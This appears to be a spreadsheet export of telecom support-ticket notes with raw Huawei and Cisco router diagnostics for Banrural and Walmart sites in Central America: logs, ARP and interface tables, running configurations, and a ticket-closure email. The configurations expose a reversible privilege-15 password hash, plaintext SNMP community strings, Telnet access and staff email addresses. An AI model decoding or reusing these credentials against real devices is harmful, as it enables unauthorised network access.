NOV 10 2018 04:09:14+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/IF_STATE(L)[34]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
NOV 10 2018 04:09:02+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/LINK_STATE(L)[35]:THE LINE PROTOCOL IP ON THE INTERFACE CELLULAR0/0/0 HAS ENTERED THE DOWN STATE.
NOV 10 2018 04:09:02+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/LINK_STATE(L)[36]:THE LINE PROTOCOL IP ON THE INTERFACE CELLULAR0/0/0 HAS ENTERED THE UP STATE.
NOV 10 2018 04:09:02+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/LINK_STATE(L)[37]:THE LINE PROTOCOL IP ON THE INTERFACE VLANIF1 HAS ENTERED THE UP STATE.
NOV 10 2018 04:09:02+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/IF_STATE(L)[38]:INTERFACE VLANIF1 HAS TURNED INTO UP STATE.
NOV 10 2018 04:09:00+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01RM/4/ROUTERID_CHANGE(L)[39]:THE ROUTER ID IS 10.164.53.126. (INSTANCEID=0)
NOV 10 2018 04:08:56+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/LINK_STATE(L)[40]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
NOV 10 2018 04:08:55+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/IF_STATE(L)[41]:INTERFACE WLAN-BSS7 HAS TURNED INTO UP STATE.
NOV 10 2018 04:08:22+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/DRVICOUTSTR(L)[42]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
NOV 10 2018 04:07:32+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01GTL/4/STATECHANGED(L)[43]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_BANRURAL_GT_AGENCIA_453&gt;
DISPLAY CLOCK
2018-11-10 04:16:18
SATURDAY
TIME ZONE(DEFAULT ZONE NAME) : UTC+00:00
&lt;CC_BANRURAL_GT_AGENCIA_453&gt;
TABLA ARP DEL ROUTER CPE:
DISPLAY ARP
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                    VLAN/CEVLAN(SIP/DIP)      PVC
------------------------------------------------------------------------------
10.16.184.16    24A5-2CCA-A644            I -         GE0/0/4
10.16.184.14    F8C2-8840-30C0  18        D-0         GE0/0/4
10.16.184.4     78DA-6E6E-8660  18        D-0         GE0/0/4
10.16.184.1     B443-2600-D755  19        D-0         GE0/0/4
10.16.184.9     F40F-1B5F-7121  14        D-0         GE0/0/4
10.164.53.126   24A5-2CCA-A643            I -         VLANIF1
10.134.53.17    24A5-2CCA-A643            I -         VLANIF1
10.134.53.22    F08E-DB17-A97A  20        D-0         GE0/0/0
                                             1/-
------------------------------------------------------------------------------
TOTAL:8         DYNAMIC:5       STATIC:0     INTERFACE:3
&lt;CC_BANRURAL_GT_AGENCIA_453&gt;
INTERFACES DEL ROUTER:
DISPLAY INT DESC
PHY: PHYSICAL
*DOWN: ADMINISTRATIVELY DOWN
(L): LOOPBACK
(S): SPOOFING
(B): BFD DOWN
^DOWN: STANDBY
(E): ETHOAM DOWN
(V): VIRTUALPORT
INTERFACE                     PHY     PROTOCOL DESCRIPTION
CELL0/0/0                     UP      UP       JAP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8902564T/_/
GE0/0/5(V)                    UP      DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC
                                               E
TUN0/0/0                      UP      UP       WAN REDUNDANTE/_/8902589T/_/
VLANIF1                       UP      UP       LAN DEL CIENTE
WLAN-BSS7                     UP      UP       HUAWEI, AR SERIES, WLAN-BSS7 INTE
                                               RFACE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/
                                               1 INTERFACE
&lt;CC_BANRURAL_GT_AGENCIA_453&gt;
DISPLAY  IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 7
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 1
THE NUMBER OF INTERFACE THAT IS UP IN PROTOCOL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PROTOCOL IS 2
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     10.0.26.32/32        UP         UP
ETHERNET0/0/0                     UNASSIGNED           DOWN       DOWN
GIGABITETHERNET0/0/4              10.16.184.16/25      UP         UP
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
LOOPBACK5                         10.212.168.240/32    UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
TUNNEL0/0/0                       10.212.168.240/32    UP         UP
VLANIF1                           10.164.53.126/24     UP         UP
&lt;CC_BANRURAL_GT_AGENCIA_453&gt;
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.16.184.16
  PING 10.16.184.16: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.16.184.16 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.20
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.16.184.16
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.16.184.16/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>F4611555</t>
  </si>
  <si>
    <t xml:space="preserve">SE VALIDA OPERATIVO CON ALARMA DE ENERGIA CON MINUTOS DE INICIOADO SE PROCEDE CON CIERRE POR CORTE DE ENERGIA COMERCIAL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 12 MINUTO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2145213 UPTIME IS 12 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 21:22:21 GMT TUE JUN 21 2022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14824P
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX1614824P
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    PERMANENT      SECURITYK9
DATA          DATAK9        PERMANENT      DATAK9
CONFIGURATION REGISTER IS 0X2102
IP2145213#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5839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145213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
NO IPV6 CEF
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
!
!
NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
IP NAME-SERVER 201.247.155.225
IP NAME-SERVER 201.247.157.225
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-1545650736
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1545650736
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1545650736
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1545650736
 CERTIFICATE SELF-SIGNED 01
  3082022B 30820194 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31353435 36353037 3336301E 170D3132 30343033 32303134
  34325A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 35343536
  35303733 3630819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281
  8100852F A564FCEE 1E466CE0 3717FD3A 8EDF998B 2FFEB713 A18B3DE2 1698E723
  DE55A6A4 7A250C2A 52D09FC0 692534D4 E87FA73E C8E0CA8D A08AB410 5B299ED1
  26EC38DB FEF0372E 93B908E7 1C4E9288 ABE1070B 4658FC41 8AE012EB 83CDAD68
  3D925CC2 B56DF50B 6AF2CA69 41525393 B0923713 08B43C18 7BF4153F 9F9399AC
  1D5B0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF 301F0603
  551D2304 18301680 14ED93D6 681DA7E6 6CD5D46F AC07967A 54B4C7DB AC301D06
  03551D0E 04160414 ED93D668 1DA7E66C D5D46FAC 07967A54 B4C7DBAC 300D0609
  2A864886 F70D0101 05050003 81810059 1AC4CD57 2465C3B7 8B9F92E7 CF56FE8B
  E40D0D75 FF25924F 1C3AE73A C5511D1D 85FF32A3 BA389767 90A6E1C1 E2AC02FD
  8EB0C3CC B2D98623 FCC61604 39113F6F A95C663A CD12F5C0 A1CAE939 EBF0932C
  2FEC0FCD 1F8A9E29 4FE0D180 42E81544 084BFC2A 303B7E44 25CE31A0 74E2D5C8
  15A08416 81CB9758 9120453A AE043B
  	QUIT
LICENSE UDI PID CISCO1941/K9 SN FTX1614824P
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 111D4A091942085E547A73
!
REDUNDANCY
!
!
!
!
IP TCP SYNWAIT-TIME 10
!
CLASS-MAP MATCH-ALL SERVICES_384K
 MATCH ANY
!
!
POLICY-MAP SERVICIOS_384K
 CLASS SERVICES_384K
  POLICE CIR 384000 BC 72000 BE 1440000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.1.5 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2145213SV/_/
 BANDWIDTH 3072
 IP ADDRESS 10.154.40.90 255.255.255.248
 IP OSPF NETWORK NON-BROADCAST
 IP OSPF PRIORITY 0
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.96.0.54 255.255.255.252
 RATE-LIMIT INPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
ROUTER OSPF 160
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 SUBNETS
 NETWORK 10.154.40.88 0.0.0.7 AREA 0
 NEIGHBOR 10.154.40.89 PRIORITY 254
!
ROUTER OSPF 1
 REDISTRIBUTE OSPF 160 SUBNETS
 NETWORK 22.96.0.52 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
 DISTANCE 100
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
IP HTTP ACCESS-CLASS 23
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP HTTP TIMEOUT-POLICY IDLE 60 LIFE 86400 REQUESTS 10000
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 23 PERMIT 10.10.10.0 0.0.0.7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
!
!
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5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ACCESS-CLASS 98 IN
 TRANSPORT INPUT TELNET SSH
LINE VTY 5 15
 ACCESS-CLASS 98 IN
 PRIVILEGE LEVEL 15
 TRANSPORT INPUT TELNET SSH
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
END
IP2145213#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4096 BYTES):
JAN  2 12:00:02.699: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JAN  2 12:00:02.859: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
JAN  2 12:00:03.019: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = DATAK9 AND LICENSE = DATAK9
JUN 22 03:22:44.279: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
JUN 22 03:22:44.279: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
JUN 22 03:22:45.115: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 22 03:22:45.115: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 22 03:22:46.215: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 22 03:22:46.215: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 21 21:22:47.471 GMT: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 03:22:47 UTC WED JUN 22 2022 TO 21:22:47 GMT TUE JUN 21 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
JUN 21 21:22:47.771 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUN 21 21:22:48.811 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUN 21 21:22:49.623 GMT: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 21 21:22:50.635 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 21 21:22:50.635 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
JUN 21 21:22:51.331 GMT: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 06-DEC-11 16:02 BY PROD_REL_TEAM
JUN 21 21:22:51.331 GMT: %SNMP-5-COLDSTART: SNMP AGENT ON HOST IP2145213 IS UNDERGOING A COLD START
JUN 21 21:22:51.951 GMT: %SSH-5-ENABLED: SSH 1.99 HAS BEEN ENABLED
JUN 21 21:22:51.951 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 21 21:22:51.959 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
JUN 21 21:22:51.959 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
JUN 21 21:22:51.959 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
JUN 21 21:22:51.959 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
JUN 21 21:23:05.123 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 21 21:23:06.123 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 21 21:24:14.095 GMT: %OSPF-5-ADJCHG: PROCESS 1, NBR 22.96.119.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 21 21:25:42.991 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.154.40.89 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
IP2145213#
SHOW CLOCK
21:34:40.847 GMT TUE JUN 21 2022
IP2145213#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.154.40.89           11   183D.5E15.B600  ARPA   GIGABITETHERNET0/0
INTERNET  10.154.40.90            -   442B.0368.C900  ARPA   GIGABITETHERNET0/0
INTERNET  22.96.0.53             10   CCEF.48A9.D700  ARPA   GIGABITETHERNET0/1
INTERNET  22.96.0.54              -   442B.0368.C901  ARPA   GIGABITETHERNET0/1
IP2145213#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/IP2145213SV/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
IP2145213#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.154.40.90    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.96.0.54      YES NVRAM  UP                    UP
LOOPBACK5                  10.166.1.5      YES NVRAM  UP                    UP
IP2145213#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALMART 10.154.40.90
  PING 10.154.40.90: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.154.40.90 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.93
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALMART 10.154.40.90
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.154.40.90/32  DIRECT  0    0                 0.0.0.0         VLANIF1760			</t>
  </si>
  <si>
    <t>F4611611</t>
  </si>
  <si>
    <t>***--- CLIENTE AUTORIZA CIERRE DE SD --***
DE: SAUL ORELLANA (VENDOR) [MAILTO:SAUL.ORELLANA0@WALMART.COM]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 05:56
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI TAMARINDO ID: CONTR00015426880OC
BUENOS DÍAS, PODEMOS CERRAR EL TICKET.
GRACIAS Y SALUDOS.</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE OPERATIVO EL SERVICIO NO PERCIVE A NIVEL WAN PERO SE TUVO UNA RECONVERGENCIA MOMENTANEA PROVOCADA POR UNA RIR 5481092  A NIVEL DE RED SE PORCEDE A VALIDAR CON EL CLEINTE .
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 4 DÍA/S, 8 HORA/S Y 48 MINUTOS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR120 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 0 WEEK, 4 DAYS, 8 HOURS, 50 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 4 DAYS, 8 HOURS, 48 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_3092&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R009C00SPC500]
#
 SYSNAME CC_WALMART_CR_TIENDA_3092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5.92 0.0.0.3
 RULE 2 PERMIT SOURCE 172.18.47.0 0.0.0.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VLANIF1
 SHUTDOWN
#
INTERFACE ETHERNET0/0/0
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION ENLACE DATOS
#
INTERFACE GIGABITETHERNET0/0/0.1107
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001633138OC/_/
 SET FLOW-STAT INTERVAL 30
 DOT1Q TERMINATION VID 1107
 IP ADDRESS 10.201.11.149 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/0.2107
 DESCRIPTION REDUNDANCY LINK TO MTR488
 DOT1Q TERMINATION VID 2107
 IP ADDRESS 10.201.41.149 255.255.255.192
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.32.5.93 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
 SHUTDOWN
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE CELLULAR0/0/0
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.120 255.255.255.255
#
BGP 64528
 ROUTER-ID 10.99.77.120
 PEER 10.201.11.129 AS-NUMBER 14754
 PEER 10.201.41.129 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.120 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.11.129 ENABLE
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.11.129 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.11.129 NEXT-HOP-LOCAL
  PEER 10.201.41.129 ENABLE
  PEER 10.201.41.129 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.5.92 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0340EEDDF2BD68
 SNMP-AGENT COMMUNITY READ %^%#8JM7CX5_3Z|,AH,[TE)U\TET!=EJA$I3\TJU~4*'7.OCV^7QR&lt;UULAR:#9I=+'QA5"9IV2U2T5(HRS7P%^%# ACL 2988
 SNMP-AGENT COMMUNITY READ %^%#VHPXM6=PO2GLYFL&amp;2L1#K:^0/QD0{ME_QT8|RJZOPZ#-0}TQOWEBN.N#}G@CEH.I#&gt;(&lt;M@P-J$=D3OX"%^%#
 SNMP-AGENT COMMUNITY READ %^%#AHORH&gt;DD2YWE@{S5GZ_E;^|V@1DWH48H*GK)1^I&gt;:BD"JCCL&lt;"0HB3PM,.~6NNRTM,FIMWP-IZV`JQPI%^%#
 SNMP-AGENT SYS-INFO LOCATION PALI SAN MIGUEL DESAMPARADOS
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1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NTP-SERVICE UNICAST-PEER 10.201.41.129
 NTP-SERVICE UNICAST-SERVER 10.201.11.129 PREFERENCE
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
SECELOG
#
RETURN
&lt;CC_WALMART_CR_TIENDA_3092&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 31
JUN 17 2022 15:11:22-06:00 CC_WALMART_CR_TIENDA_3092 %%01RM/4/IPV4_DEFT_RT_CHG(L)[0]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=BGP, EXITIF=GIGABITETHERNET0/0/0.1107, NEXTHOP=10.201.11.129, NEIGHBOUR=10.201.11.129, PREFERENCE=255, LABEL=NULL, METRIC=0)
JUN 17 2022 15:11:22-06:00 CC_WALMART_CR_TIENDA_3092 %%01BGP/3/STATE_CHG_UPDOWN(L)[1]:THE STATUS OF THE PEER 10.201.41.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN 17 2022 15:11:21-06:00 CC_WALMART_CR_TIENDA_3092 %%01BGP/3/STATE_CHG_UPDOWN(L)[2]:THE STATUS OF THE PEER 10.201.11.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
JUN 17 2022 15:11:07-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/DRVICOUTSTR(L)[3]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
JUN 17 2022 15:11:07-06:00 CC_WALMART_CR_TIENDA_3092 %%01IFPDT/4/DRVICOUTSTR(L)[4]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
JUN 17 2022 15:11:02-06:00 CC_WALMART_CR_TIENDA_3092 %%01OSPF/4/NBR_CHANGE_E(L)[5]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.94, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
JUN 17 2022 15:11:02-06:00 CC_WALMART_CR_TIENDA_3092 %%01OSPF/4/NBR_CHANGE_E(L)[6]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.5.94, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
